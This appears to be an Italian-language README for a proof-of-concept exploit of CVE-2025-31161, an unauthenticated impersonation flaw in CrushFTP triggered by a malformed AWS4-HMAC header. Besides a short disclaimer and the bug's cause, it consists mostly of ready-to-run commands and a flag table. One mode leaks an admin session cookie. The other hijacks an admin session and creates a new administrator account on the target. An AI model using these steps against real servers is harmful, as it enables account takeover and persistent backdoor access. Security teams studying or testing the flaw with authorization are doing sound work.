
Una prova di concetto per CVE-2025-31161, che utilizza un'intestazione HTTP manipolata per eseguire l'impersonificazione non autenticata di qualsiasi utente nel server Crush FTP.
Attenzione: Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e a scopi educativi. L'uso non autorizzato contro sistemi per i quali non si dispone di esplicita autorizzazione è illegale.
Questo strumento è una prova di concetto (PoC) per CVE-2025-31161, una vulnerabilità critica di bypass dell'autenticazione in CrushFTP (versioni < 10.8.4 e < 11.3.1). La vulnerabilità sfrutta un errore logico nell'analisi dell'header AWS4-HMAC, dove un header danneggiato innesca un'eccezione IndexOutOfBounds. Questa eccezione impedisce al server di pulire la sessione, lasciando di fatto l'utente autenticato come l'account richiesto senza password.
Credential=user/) causa un'eccezione Java non gestita, bypassando la pulizia della sessione.requestspip install requests
Lo script opera in due modalità: Check (Osservazione) e Exploit (Azione).
Verifica se il target è vulnerabile tentando di divulgare un cookie di sessione per l'account amministratore predefinito. Questo non modifica il sistema target.
python3 exploit.py check -u <target_ip> -p <port>
python3 exploit.py check -u 192.168.1.50 -p 8080Dirotta una sessione per l'utente amministrativo specificato e la utilizza per iniettare un nuovo account amministrativo nel gruppo MainUsers.
python3 exploit.py exploit -u <target_ip> -p <port> -a <admin_user> -nu <new_username> -np <new_password>
python3 exploit.py exploit -u 192.168.1.50 -p 8080 -a crushadmin -nu operator -np StrongPass123!| Flag | Nome | Descrizione | Predefinito |
|---|
-u | --url | Indirizzo IP o hostname del target | Obbligatorio |
-p | --port | Porta del target | 8080 |
-a | --admin_user | Account amministrativo esistente da impersonare | crushadmin |
-nu | --new_user | Nome utente per il nuovo account amministrativo | Obbligatorio |
-np | --new_password | Password per il nuovo account amministrativo | Obbligatorio |